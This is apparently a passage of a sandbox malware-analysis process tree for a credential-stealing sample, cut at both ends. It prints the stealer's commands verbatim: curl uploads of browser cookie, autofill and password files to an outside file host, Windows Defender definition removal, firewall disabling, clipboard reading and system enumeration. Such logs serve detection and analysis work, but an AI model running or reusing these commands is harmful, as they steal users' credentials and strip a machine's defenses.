        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
        6⤵
        
        PID:9648
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
        7⤵
        
        PID:13572
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Get-Clipboard -TextFormatType Text"
        6⤵
        Clipboard Data
        
        PID:11528
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
        6⤵
        
        PID:11588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
        7⤵
        
        PID:16420
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get csname, description, installdate, organization, registereduser, numberofprocesses
        6⤵
        
        PID:11996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        6⤵
        
        PID:12084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcook.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:13988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:14316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppassw.txt" https://store4.gofile.io/uploadFile"
        6⤵
        
        PID:14780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
      4⤵
      PID:668
    - - C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        5⤵
        
        PID:1892
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3356
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:2028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:1752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:3280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:5152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:6140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:3044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:7068
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:2384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:7364
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:8376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:9980
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        15⤵
        
        PID:14900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        14⤵
        
        PID:8696
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        15⤵
        
        PID:13760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        14⤵
        
        PID:15760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:7380
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:9108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:12404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:12140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        12⤵
        
        PID:16208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        12⤵
        
        PID:14636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:4920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:6900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:6288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:8588
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:14844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:8108
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:7676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:7588
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:8824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:12240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:12248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        10⤵
        
        PID:14288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:5676
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:4140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:5768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:7356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:7956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        13⤵
        
        PID:13800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        12⤵
        
        PID:11448
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        13⤵
        
        PID:16288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:7256
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:10276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:10436
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:15464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:12824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:17284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:16528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:6208
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:7724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:8312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:11408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:9976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:10544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:12092
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        9⤵
        
        PID:16428
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:5892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:1744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:5220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:5764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:6220
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:7840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:8704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        12⤵
        
        PID:16652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:6520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:9012
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:10632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:12832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:17384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:11324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:7832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:14572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:10592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:13872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:11776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:12740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:14712
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:5432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:2436
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:4560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:1804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:6356
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:8028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:14464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:7416
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:10296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:9748
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:13888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:12148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        10⤵
        
        PID:16168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        10⤵
        
        PID:15008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:6380
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:7348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:6328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:9252
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:14860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:11552
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:8148
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:8304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:8564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:4880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:9152
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:13924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:12860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:13280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:15220
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:5228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:5268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:7864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:10760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:12024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:11632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:8420
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:14220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:14308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:16160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:14984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        6⤵
        
        PID:6736
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        6⤵
        
        PID:7220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12580
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        6⤵
        
        PID:7996
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        7⤵
        
        PID:8288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
        6⤵
        
        PID:11572
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
        6⤵
        
        PID:14080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
        6⤵
        
        PID:16080
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Get-Clipboard -TextFormatType Text"
        6⤵
        Clipboard Data
        
        PID:14964
      - C:\Windows\System32\Wbem\wmic.exe
        
